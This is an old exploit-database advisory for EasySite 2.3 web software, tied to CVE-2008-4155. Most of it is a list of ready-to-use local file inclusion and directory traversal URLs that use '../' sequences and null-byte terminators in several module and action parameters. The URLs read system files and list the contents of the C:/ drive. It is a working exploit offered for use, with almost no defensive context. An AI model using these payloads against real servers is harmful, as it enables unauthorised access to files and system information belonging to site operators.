Lucene search
SirGodEDB-ID:6288HistoryAug 21, 2008 - 12:00 a.m.
easysite 2.3 - Multiple Vulnerabilities
2008-08-2100:00:00
SirGod
www.exploit-db.com
21
AI Score
7.4
Confidence
Low
####################################################################
[+] EasySite v2.3 Multiple Remote Vulnerabilities
[+] Discovered By SirGod
[+] www.mortal-team.org
[+] Greetz : E.M.I.N.E.M, Ras ,Puscas_marin ,ToxicBlood,MesSiAH,xZu,HrN
####################################################################
[+] Local File Inclusion
http://localhost/www/index.php?module=Accueil&action=../../../../autoexec.bat%00
http://localhost/modules/Module/index.php?module=../../../../autoexec.bat%00
http://localhost/modules/Module/index.php?ss_module=../../../../autoexec.bat%00
http://localhost/modules/Module/index.php?ss_action=../../../../autoexec.bat%00
http://localhost/modules/Themes/index.php?ss_action=../../../../autoexec.bat%00
http://localhost/modules/Themes/index.php?ss_module=../../../../autoexec.bat%00
http://localhost/modules/Themes/index.php?module=../../../../autoexec.bat%00
And many others...
This will open autoexec.bat
[+] Arbitrary View Folder Contents
You can view the folder contents and the content of files view via LFI.
http://localhost/www/index.php?module=../../../
http://localhost/inc/vmenu.php?module=../../../
This will open C:/ directory and will show all the files from C:/ .
Example :
* BOOTSECT.BAK
* BcBtRmv.log
* IO.SYS
* MSDOS.SYS
* autoexec.bat
* bootmgr
* config.sys
* grldr
* hiberfil.sys
* pagefile.sys
####################################################################
# milw0rm.com [2008-08-21]Related
cve
cve
CVE-2008-4155
2008-09-19 23:00:00
nvd
nvd
CVE-2008-4155
2008-09-19 23:00:00
prion
prion
Directory traversal
2008-09-19 23:00:00
cvelist
cvelist
CVE-2008-4155
2008-09-19 23:00:00